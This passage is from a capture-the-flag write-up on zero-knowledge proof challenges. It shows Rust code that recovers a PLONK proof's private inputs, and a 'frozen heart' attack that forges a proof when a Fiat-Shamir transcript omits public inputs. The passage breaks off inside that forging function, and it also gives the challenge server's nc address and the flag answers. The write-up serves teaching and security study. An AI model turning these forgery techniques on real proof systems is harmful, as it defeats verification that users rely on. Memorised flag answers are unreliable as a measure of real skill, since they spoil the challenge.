&lt;p&gt;$$a(\zeta) = b L_1(\zeta) + y L_2(\zeta) + x L_3(\zeta) + b L_4(\zeta) + y L_5(\zeta) + b L_6(\zeta) + b L_7(\zeta) + b L_8(\zeta).$$&lt;&#x2F;p&gt;
&lt;p&gt;All the terms in this expression are known to the participants except for $x$, which can be solved for. To do so, the participants need to recover the challenges to obtain $\zeta$ and evaluate the Lagrange polynomials at it.&lt;&#x2F;p&gt;
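The recurrence used to evaluate the Lagrange basis at $\zeta$, namely $L_i(\zeta) = \omega \cdot L_{i-1}(\zeta) \cdot (\zeta - \omega^{i-1}) / (\zeta - \omega^{i})$, can be sanity-checked against the direct product formula. This is a toy sketch over $F_{17}$ with a subgroup of order 4, purely illustrative and separate from the challenge code:

```rust
// Check the Lagrange-basis recurrence over F_17 with the multiplicative
// subgroup H = {1, 4, 16, 13} of order n = 4, generated by omega = 4.
const P: u64 = 17;

fn pow_mod(mut b: u64, mut e: u64) -> u64 {
    let mut acc = 1;
    b %= P;
    while e > 0 {
        if e & 1 == 1 { acc = acc * b % P; }
        b = b * b % P;
        e >>= 1;
    }
    acc
}
fn inv(a: u64) -> u64 { pow_mod(a, P - 2) } // Fermat inverse
fn sub(a: u64, b: u64) -> u64 { (a + P - b % P) % P }

// Direct product formula: L_i(x) = prod_{j != i} (x - w^j) / (w^i - w^j).
fn lagrange_direct(domain: &[u64], i: usize, x: u64) -> u64 {
    let mut acc = 1;
    for (j, &wj) in domain.iter().enumerate() {
        if j != i {
            acc = acc * sub(x, wj) % P * inv(sub(domain[i], wj)) % P;
        }
    }
    acc
}

fn main() {
    let (n, omega, zeta) = (4u64, 4u64, 7u64); // zeta is an arbitrary point off H
    let domain: Vec<u64> = (0..n).map(|i| pow_mod(omega, i)).collect();

    // L_1(zeta) from the closed form (zeta^n - 1) / (n * (zeta - 1)).
    let mut li = sub(pow_mod(zeta, n), 1) * inv(sub(zeta, 1)) % P * inv(n) % P;
    assert_eq!(li, lagrange_direct(&domain, 0, zeta));

    // All subsequent L_i(zeta) via the recurrence; each matches the
    // direct formula.
    for i in 1..domain.len() {
        li = omega * li % P * sub(zeta, domain[i - 1]) % P * inv(sub(zeta, domain[i])) % P;
        assert_eq!(li, lagrange_direct(&domain, i, zeta));
    }
    println!("recurrence matches the direct Lagrange formula");
}
```

The recurrence costs one multiplication and one division per basis polynomial instead of a full product per polynomial, which is why the solution code below uses it.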
&lt;p&gt;The second private input $h$ can be computed as $h = (y - b) &#x2F; x$. The following piece of code recovers the challenge $\zeta$, computes the Lagrange polynomials at $\zeta$ and recovers $x$ and $h$:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn compute_private_input&amp;lt;F, CS&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;Proof&amp;lt;F, CS&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    vk: &amp;amp;VerificationKey&amp;lt;CS::Commitment&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    public_input: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    common_preprocessed_input: &amp;amp;CommonPreprocessedInput&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; (FieldElement&amp;lt;F&amp;gt;, FieldElement&amp;lt;F&amp;gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsField,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    CS: IsCommitmentScheme&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    CS::Commitment: Serializable,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Replay interactions to recover challenges. We are only interested in \zeta&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut transcript = new_strong_fiat_shamir_transcript::&amp;lt;F, CS&amp;gt;(vk, public_input);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.a_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.b_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.c_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let _beta = FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let _gamma = FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.z_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let _alpha = FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.t_lo_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.t_mid_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.t_hi_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let zeta = FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Compute `x` and `h`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let [b, y] = [&amp;amp;public_input[0], &amp;amp;public_input[1]];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let n = common_preprocessed_input.n as u64;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let omega = &amp;amp;common_preprocessed_input.omega;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let domain = &amp;amp;common_preprocessed_input.domain;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Compute L_1(\zeta). This polynomial is equal to zero at&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;each point in the domain, except for the first one&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;where it is equal to unity&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let l1_zeta =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (zeta.pow(n) - FieldElement::one()) &#x2F; (&amp;amp;zeta - FieldElement::one()) &#x2F; FieldElement::from(n);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut li_zeta = l1_zeta;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut lagrange_basis_zeta = Vec::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    lagrange_basis_zeta.push(li_zeta.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Compute all other Lagrange polynomials using&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; the relationship among them&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for i in 1..domain.len() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        li_zeta = omega * &amp;amp;li_zeta * ((&amp;amp;zeta - &amp;amp;domain[i - 1]) &#x2F; (&amp;amp;zeta - &amp;amp;domain[i]));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        lagrange_basis_zeta.push(li_zeta.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Recover x by relating a at \zeta and the public inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x = (&amp;amp;proof.a_zeta&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - b * &amp;amp;lagrange_basis_zeta[3]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - y * &amp;amp;lagrange_basis_zeta[4]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - b * &amp;amp;lagrange_basis_zeta[0]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - y * &amp;amp;lagrange_basis_zeta[1]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - b * &amp;amp;lagrange_basis_zeta[5]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - b * &amp;amp;lagrange_basis_zeta[6]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        - b * &amp;amp;lagrange_basis_zeta[7])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F; &amp;amp;lagrange_basis_zeta[2];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Recover h given that x is known    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let h = (y - b) &#x2F; &amp;amp;x;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (x, h)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The solution for the coordinates is:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. `x: &amp;quot;2194826651b32ca1055614fc6e2f2de86eab941d2c55bd467268e9&amp;quot;`,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. `h: &amp;quot;432904cca36659420aac29f8dc5e5bd0dd57283a58ab7a8ce4d1ca&amp;quot;`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The flag is the concatenation of the two: &lt;code&gt;FLAG: 2194826651b32ca1055614fc6e2f2de86eab941d2c55bd467268e9432904cca36659420aac29f8dc5e5bd0dd57283a58ab7a8ce4d1ca&lt;&#x2F;code&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;loki-s-trapdoor&quot;&gt;Loki’s trapdoor&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;challenge-1&quot;&gt;Challenge&lt;&#x2F;h3&gt;
&lt;p&gt;After successfully breaking into Loki’s vault and getting access to some of his finest treasures and weapons, you spot a small trapdoor under a carpet.&lt;&#x2F;p&gt;
&lt;p&gt;The trapdoor is locked and contains a device with a PLONK prover. It says: Prove that the point $( 1 , y)$ belongs to the elliptic curve $y^2 = x^3 + 4$.&lt;&#x2F;p&gt;
&lt;p&gt;You see that, in order to prove this, you need $y^2 - x^3 - 4$ to be equal to zero, which corresponds to the circuit for the prover provided by Loki.&lt;&#x2F;p&gt;
&lt;p&gt;Can you open the trapdoor?&lt;&#x2F;p&gt;
&lt;p&gt;nc 44.203.113.160 4000&lt;&#x2F;p&gt;
&lt;p&gt;Additional information is in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ingonyama-zk&#x2F;ZKCTF-lokis-trapdoor&quot;&gt;repo&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;FLAG FORMAT: ZKCTF{XXX…XXX}&lt;&#x2F;p&gt;
&lt;h3 id=&quot;solution-1&quot;&gt;Solution&lt;&#x2F;h3&gt;
&lt;p&gt;This challenge exploits the frozen heart vulnerability, which arises when the Fiat-Shamir transformation is not implemented correctly. The main problem is that $(1, y)$ is not a point on the BLS12-381 elliptic curve: if it were, then $y^2 = 1^3 + 4 = 5$ would have to hold, but $5$ is not a quadratic residue modulo the BLS12-381 scalar field prime. Therefore, the only way to solve the challenge is to forge a false proof.&lt;&#x2F;p&gt;
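The non-residue claim can be checked with Euler's criterion: $a$ is a square modulo an odd prime $p$ iff $a^{(p-1)/2} \equiv 1 \pmod p$. Running it on the actual BLS12-381 scalar prime needs big-integer arithmetic, so this sketch uses a toy prime where $5$ also happens to be a non-residue; the function name `is_square` is illustrative.

```rust
// Euler's criterion over a toy prime p = 17 (illustration only; the real
// check uses the BLS12-381 scalar field modulus with a bignum library).
const P: u64 = 17;

fn pow_mod(mut b: u64, mut e: u64) -> u64 {
    let mut acc = 1;
    b %= P;
    while e > 0 {
        if e & 1 == 1 { acc = acc * b % P; }
        b = b * b % P;
        e >>= 1;
    }
    acc
}

/// True iff `a` is a nonzero quadratic residue mod P:
/// a^((P-1)/2) == 1 by Euler's criterion.
fn is_square(a: u64) -> bool {
    pow_mod(a, (P - 1) / 2) == 1
}

fn main() {
    // 5 is a non-residue mod 17: 5^8 ≡ -1 (mod 17), so no y exists
    // with y^2 = 5, exactly as in the challenge (just with a bigger prime).
    assert!(!is_square(5));
    // Sanity check: every nonzero square passes the test.
    for x in 1..P {
        assert!(is_square(x * x % P));
    }
    println!("5 is not a quadratic residue mod {}", P);
}
```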
&lt;p&gt;The circuit is:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PUBLIC INPUT: x&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;PUBLIC INPUT: y&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ASSERT 0 == y^2 - x^3 - 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It is instantiated over the &lt;code&gt;BLS12-381&lt;&#x2F;code&gt; scalar field.&lt;&#x2F;p&gt;
&lt;p&gt;The vulnerability stems from a bug in the implementation of strong Fiat-Shamir. A correct implementation should add, among other things, all the public inputs to the transcript at initialization. If a public input is not added to the transcript and is under the attacker’s control, they can forge a fake proof. Fixing &lt;code&gt;x=1&lt;&#x2F;code&gt; leaves &lt;code&gt;y&lt;&#x2F;code&gt; under the user’s control. We can see that the Fiat-Shamir transcript does not incorporate the public input, as shown &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ingonyama-zk&#x2F;ZKCTF-lokis-trapdoor&#x2F;blob&#x2F;69eba0d41d56a7831b4532d5adc2c21720764885&#x2F;lambdaworks_plonk_prover&#x2F;src&#x2F;setup.rs#L70C1-L73C23&quot;&gt;here&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn new_strong_fiat_shamir_transcript&amp;lt;F, CS&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    vk: &amp;amp;VerificationKey&amp;lt;CS::Commitment&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _public_input: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; DefaultTranscript&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The attack is described in Section V of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;691.pdf&quot;&gt;Weak Fiat-Shamir Attacks on Modern Proof Systems&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Here is a summary of the attack:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;B10en9A93.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Instead of taking random polynomials (steps (1) to (7)), the current solution takes a valid proof for the pair &lt;code&gt;x=0&lt;&#x2F;code&gt;, &lt;code&gt;y=2&lt;&#x2F;code&gt; and uses it to forge a &lt;code&gt;y&lt;&#x2F;code&gt; for &lt;code&gt;x=1&lt;&#x2F;code&gt; that’s compatible with the original proof.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[allow(unused)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn forge_y_for_valid_proof&amp;lt;F: IsField, CS: IsCommitmentScheme&amp;lt;F&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;Proof&amp;lt;F, CS&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    vk: &amp;amp;VerificationKey&amp;lt;CS::Commitment&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    common_preprocessed_input: CommonPreprocessedInput&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; FieldElement&amp;lt;F&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    CS::Commitment: Serializable,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Replay interactions like the verifier&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut transcript = new_strong_fiat_shamir_transcript::&amp;lt;F, CS&amp;gt;(vk, &amp;amp;[]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.a_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.b_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.c_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let beta = FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let gamma = FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.z_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let alpha = FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.t_lo_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.t_mid_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.t_hi_1.serialize());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let zeta = &amp;amp;FieldElement::from_bytes_be(&amp;amp;transcript.challenge()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Forge public input&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let zh_zeta = zeta.pow(common_preprocessed_input.n) - FieldElement::one();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let omega = &amp;amp;common_preprocessed_input.omega;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let n = common_preprocessed_input.n as u64;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let one = &amp;amp;FieldElement::one();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let l1_zeta = ((zeta.pow(n) - one) &#x2F; (zeta - one)) &#x2F; FieldElement::from(n);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let l2_zeta = omega * &amp;amp;l1_zeta * (zeta - one) &#x2F; (zeta - omega);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut p_constant_zeta = &amp;amp;alpha&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        * &amp;amp;proof.z_zeta_omega&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        * (&amp;amp;proof.c_zeta + &amp;amp;gamma)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        * (&amp;amp;proof.a_zeta + &amp;amp;beta * &amp;amp;proof.s1_zeta + &amp;amp;gamma)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        * (&amp;amp;proof.b_zeta + &amp;amp;beta * &amp;amp;proof.s2_zeta + &amp;amp;gamma);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    p_constant_zeta = p_constant_zeta - &amp;amp;l1_zeta * &amp;amp;alpha * &amp;amp;alpha;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p_zeta = p_constant_zeta + &amp;amp;proof.p_non_constant_zeta;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    -(p_zeta + l1_zeta * one - (&amp;amp;zh_zeta * &amp;amp;proof.t_zeta)) &#x2F; l2_zeta&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
